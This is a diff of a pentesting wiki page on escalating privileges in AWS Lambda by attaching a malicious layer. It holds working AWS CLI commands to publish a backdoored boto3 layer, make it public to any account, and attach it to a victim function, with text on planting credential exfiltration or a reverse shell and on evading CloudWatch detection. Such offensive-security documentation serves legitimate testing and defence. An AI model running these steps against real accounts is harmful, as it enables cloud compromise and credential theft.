GITBOOK-581: change request with no subject merged in GitBook

pentesting-cloud/aws-pentesting/aws-privilege-escalation/aws-lambda-privesc.md

@@ -235,40 +235,39 @@ For example, the library boto3 is loaded from `/var/runtime/boto3` (4th position
 
 #### Exploitation
 
-**Attaching a layer to a function** only requires the `lambda:UpdateFunctionConfiguration` permission and **layers can be shared cross-account**. We also would need to know **what libraries they are using**, so we can override them correctly, but in this example, we’ll just **assume the attacked function is importing boto3**.
+It's possible to abuse the permission `lambda:UpdateFunctionConfiguration` to **add a new layer** to a lambda function. To execute arbitrary code this layer need to contain some **library that the lambda is going to import.** If you can read the code of the lambda, you could find this easily, also note that it might be possible that the lambda is **already using a layer** and you could **download** the layer and **add your code** in there.
 
-Just to be safe, we’re going to use Pip to install the same version of the boto3 library from the Lambda runtime that we are targeting (Python 3.7), just so there is nothing different that might cause problems in the target function. That runtime currently uses boto3 version 1.9.42.
-
-With the following code, we’ll install boto3 version 1.9.42 and its dependencies to a local "lambda\_layer" folder:
+For example, lets suppose that the lambda is using the library boto3, this will create a local layer with the last version of the library:
 
 ```
-pip3 install -t ./lambda_layer boto3==1.9.42
+pip3 install -t ./lambda_layer boto3
 ```
 
-Next, we will open `/lambda_layer/boto3/__init__.py` and add the malicious code. The payload we will be adding looks like this:
-
-![](<../../../.gitbook/assets/image (26).png>)
+You can open `./lambda_layer/boto3/__init__.py` and **add the backdoor in the global code** (a function to exfiltrate credentials or get a reverse shell for example).
 
-`requests` is being imported from `botocore`. The function will exfiltrate en env variables, and the try-except and 0.1 timeout are there to ensure this code doesn't break anything.
+Then, zip that `./lambda_layer` directory and **upload the new lambda layer** in your own account (or in the victims one, but you might not have permissions for this).\
+Note that you need to create a python folder and put the libraries in there to override /opt/python/boto3. Also, the layer needs to be **compatible with the python version** used by the lambda and if you upload it to your account, it needs to be in the **same region:**
 
-{% hint style="info" %}
-**Important note:** You should no longer `from botocore.vendored import requests` in real pentests, because a “DeprecationWarning” will be printed to the CloudWatch logs of that function, which will likely cause you to get caught by a defender.
-{% endhint %}
+{% code overflow="wrap" %}
+```bash
+aws lambda publish-layer-version --layer-name "boto3" --zip-file file://backdoor.zip --compatible-architectures "x86_64" "arm64" --compatible-runtimes "python3.9" "python3.8" "python3.7" "python3.6"
+```
+{% endcode %}
 
-Now, bundle that code into a **ZIP file** and **upload** it to a **new Lambda layer in the ATTACKER account**. You will need to create a “python” folder first and put your libraries in there so that once we upload it to Lambda, the code will be found at “/opt/python/boto3”. Also, make sure that the layer is compatible with Python 3.7 and that the **layer is in the same region as our target function**. Once that’s done, we’ll use `lambda:AddLayerVersionPermission` to **make the layer publicly accessible** so that our target account can use it. Use your personal AWS credentials for this API call.
+Now, make the uploaded lambda layer **accessible by any account**:
 
 ```bash
 aws lambda add-layer-version-permission --layer-name boto3 \
  --version-number 1 --statement-id public \
  --action lambda:GetLayerVersion --principal *
 ```
 
-Now with the **compromised credentials** we have, we will run the following command on our target Lambda function “s3-getter”, which will **attach our cross-account Lambda layer**.
+And attach the lambda layer to the victim lambda function:
 
 ```bash
 aws lambda update-function-configuration \
- --function-name s3-getter \
- --layers arn:aws:lambda:REGION:OUR-ACCOUNT-ID:layer:boto3:1 \
+ --function-name <func-name> \
+ --layers arn:aws:lambda:<region>:<attacker-account-id>:layer:boto3:1 \
  --timeout 300 #5min for rev shells
 ```